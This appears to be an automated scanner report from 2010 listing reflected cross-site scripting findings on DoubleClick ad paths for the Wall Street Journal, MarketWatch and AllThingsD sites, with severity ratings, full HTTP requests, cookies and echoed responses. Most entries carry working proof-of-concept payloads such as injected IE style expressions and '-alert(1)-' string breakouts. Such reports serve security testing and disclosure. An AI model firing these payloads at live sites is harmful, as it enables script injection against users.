The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af3c"style%3d"x%3aexpression(alert(1))"afc5bf67239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5af3c"style="x:expression(alert(1))"afc5bf67239 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/microsite_hsbcemi;sz=300x250;ord=123456789?&5af3c"style%3d"x%3aexpression(alert(1))"afc5bf67239=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/ad/emi
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 07 Nov 2010 06:17:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 652
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e76b7"style%3d"x%3aexpression(alert(1))"19ddf51cf31 was submitted in the sz parameter. This input was echoed as e76b7"style="x:expression(alert(1))"19ddf51cf31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/microsite_hsbcemi;sz=e76b7"style%3d"x%3aexpression(alert(1))"19ddf51cf31 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/ad/emi
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 458
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:16:51 GMT
Expires: Sun, 07 Nov 2010 06:16:51 GMT
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea4e"%20a%3db%2030418e91b1b was submitted in the sz parameter. This input was echoed as 9ea4e" a=b 30418e91b1b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/microsite_supplychainrisk;sz=9ea4e"%20a%3db%2030418e91b1b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.supplychainriskinsights.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 433
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:19:51 GMT
Expires: Sun, 07 Nov 2010 06:19:51 GMT
1.16. http://ad.doubleclick.net/adi/interactive.wsj.com/smb_front [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/smb_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e302"%20style%3dx%3aexpression(alert(1))%20a99274248e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e302" style=x:expression(alert(1)) a99274248e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/smb_front?9e302"%20style%3dx%3aexpression(alert(1))%20a99274248e7=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:11:42 GMT
Expires: Sun, 07 Nov 2010 09:11:42 GMT
Connection: close
1.17. http://ad.doubleclick.net/adi/interactive.wsj.com/sports_interactive [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.doubleclick.net
Path: /adi/interactive.wsj.com/sports_interactive
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4a27"style%3d"x%3aexpression(alert(1))"de4c8fecc35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4a27"style="x:expression(alert(1))"de4c8fecc35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/sports_interactive?d4a27"style%3d"x%3aexpression(alert(1))"de4c8fecc35=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:12:36 GMT
Expires: Sat, 06 Nov 2010 16:12:36 GMT
Connection: close
1.18. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/weekend
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b0f"%20a%3db%20cd333a3ad45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25b0f" a=b cd333a3ad45 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/weekend?25b0f"%20a%3db%20cd333a3ad45=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 432
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:10:55 GMT
Expires: Sat, 06 Nov 2010 16:10:55 GMT
Connection: close
1.19. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/weekend
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1543"style%3d"x%3aexpression(alert(1))"b7baab4d0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1543"style="x:expression(alert(1))"b7baab4d0c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/weekend?c1543"style%3d"x%3aexpression(alert(1))"b7baab4d0c0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 457
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 03:45:30 GMT
Expires: Sun, 07 Nov 2010 03:45:30 GMT
Connection: close
1.20. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brand_channel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b7bf"style%3d"x%3aexpr/**/ession(alert(1))"4d00f4882f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b7bf"style="x:expr/**/ession(alert(1))"4d00f4882f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brand_channel;u=%5e%5e;sz=377x140;tile=8;ord=1978751583?&6b7bf"style%3d"x%3aexpr/**/ession(alert(1))"4d00f4882f1=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 06 Nov 2010 16:06:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 571
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/t;216938922;3-0;0;39274004;29332-377/140;38766073/38783830/1;u=^^;~okv=;u=^^;sz=377x140;tile=8;;6b7bf"style="x:expr/**/ession(alert(1))"4d00f4882f1=1;~aopt=6/1/ff/1;~sscs=%3fhttp://it-jobs.fins.com/?reflink=djm_bcu_tech_x140"> ...[SNIP]...
1.21. http://ad.doubleclick.net/adi/marketwatch.com/brokerpos1 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brokerpos1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6511e"style%3d"x%3aexpression(alert(1))"0a3f500c948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6511e"style="x:expression(alert(1))"0a3f500c948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos1;pos=1;u=%5e%5e;sz=120x60;tile=2;ord=919275682?&6511e"style%3d"x%3aexpression(alert(1))"0a3f500c948=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 07 Nov 2010 06:25:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 714
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/w;221951727;0-0;0;45331322;6-120/60;36397720/36415600/1;u=^^;~okv=;pos=1;u=^^;sz=120x60;tile=2;;6511e"style="x:expression(alert(1))"0a3f500c948=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;224184249;44406145;d?https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S034301&ch_id=D&s_id=MRKWTCH&c_ ...[SNIP]...
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922e5"style%3d"x%3aexpression(alert(1))"a8a4994886a was submitted in the pos parameter. This input was echoed as 922e5"style="x:expression(alert(1))"a8a4994886a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos1;pos=922e5"style%3d"x%3aexpression(alert(1))"a8a4994886a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 682
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:24:35 GMT
Expires: Sun, 07 Nov 2010 06:24:35 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/y;221951727;0-0;0;45331322;255-0/0;36397720/36415600/1;;~okv=;pos=922e5"style="x:expression(alert(1))"a8a4994886a;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;224184249;44406145;d?https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S034301&ch_id=D&s_id=MRKWTCH&c_id ...[SNIP]...
1.23. http://ad.doubleclick.net/adi/marketwatch.com/brokerpos5 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brokerpos5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dfc"style%3d"x%3aexpression(alert(1))"33265db92da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2dfc"style="x:expression(alert(1))"33265db92da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos5;pos=3;u=%5e%5e;sz=120x60;tile=4;ord=919275682?&c2dfc"style%3d"x%3aexpression(alert(1))"33265db92da=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 07 Nov 2010 06:25:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 572
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/v;230464270;3-0;0;50680922;6-120/60;39204729/39222516/1;u=^^;~okv=;pos=3;u=^^;sz=120x60;tile=4;;c2dfc"style="x:expression(alert(1))"33265db92da=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;231604649;54990366;q"> ...[SNIP]...
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe20c"style%3d"x%3aexpression(alert(1))"8506db9468c was submitted in the pos parameter. This input was echoed as fe20c"style="x:expression(alert(1))"8506db9468c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos5;pos=fe20c"style%3d"x%3aexpression(alert(1))"8506db9468c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 527
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 06:24:42 GMT
Expires: Sun, 07 Nov 2010 06:24:42 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/o;230464270;1-0;0;50680922;255-0/0;39204891/39222678/1;;~okv=;pos=fe20c"style="x:expression(alert(1))"8506db9468c;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;231605117;54990366;h"> ...[SNIP]...
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de2c"><a>2a7e06befad was submitted in the u parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/marketwatch.com/frontpage;u=1de2c"><a>2a7e06befad HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 724
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:04:48 GMT
Expires: Sat, 06 Nov 2010 16:04:48 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/m;229999471;2-0;0;53184844;4986-300/600;38567025/38584782/1;u=1de2c"><a>2a7e06befad;~aopt=0/ff/ff/ff;~fdr=230162981;0-0;0;13112443;4986-300/600;38665986/38683743/1;u=1de2c"+<a+2a7e06befad;~okv=;u=1de2c" <a 2a7e06befad;~aopt=2/1/ff/1;~sscs=%3fhttp://www.schwabat.com/offer/offerdirect. ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca54f'-alert(1)-'de58ac46533 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/digitaldaily_singlepost;tile=ca54f'-alert(1)-'de58ac46533 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://digitaldaily.allthingsd.com/20101103/android-taking-smartphone-market-share-from-everyone-but-apple/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:30:36 GMT
Expires: Sun, 07 Nov 2010 09:30:36 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d0a9'-alert(1)-'a6907d4d1c6 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/front;tile=8d0a9'-alert(1)-'a6907d4d1c6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 589
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 06 Nov 2010 16:03:38 GMT
Expires: Sat, 06 Nov 2010 16:03:38 GMT
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3500'-alert(1)-'4ad3366cd2e was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general;tile=a3500'-alert(1)-'4ad3366cd2e HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/mobile/iphone/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:28:44 GMT
Expires: Sun, 07 Nov 2010 09:28:44 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e59e8'-alert(1)-'c2da04182b1 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_about;tile=e59e8'-alert(1)-'c2da04182b1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/about/
Cookie: id=228ef07ef3000058|1620481/535815/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 10:03:58 GMT
Expires: Sun, 07 Nov 2010 10:03:58 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef32'-alert(1)-'3095a69cbb0 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_advertise;tile=7ef32'-alert(1)-'3095a69cbb0 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://allthingsd.com/advertise/
Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 47859
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 07 Nov 2010 09:28:01 GMT
Expires: Sun, 07 Nov 2010 09:28:01 GMT
Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00fc413'-alert(1)-'af096a1586a was submitted in the tile parameter. This input was echoed as fc413'-alert(1)-'af096a1586a in the application's response.
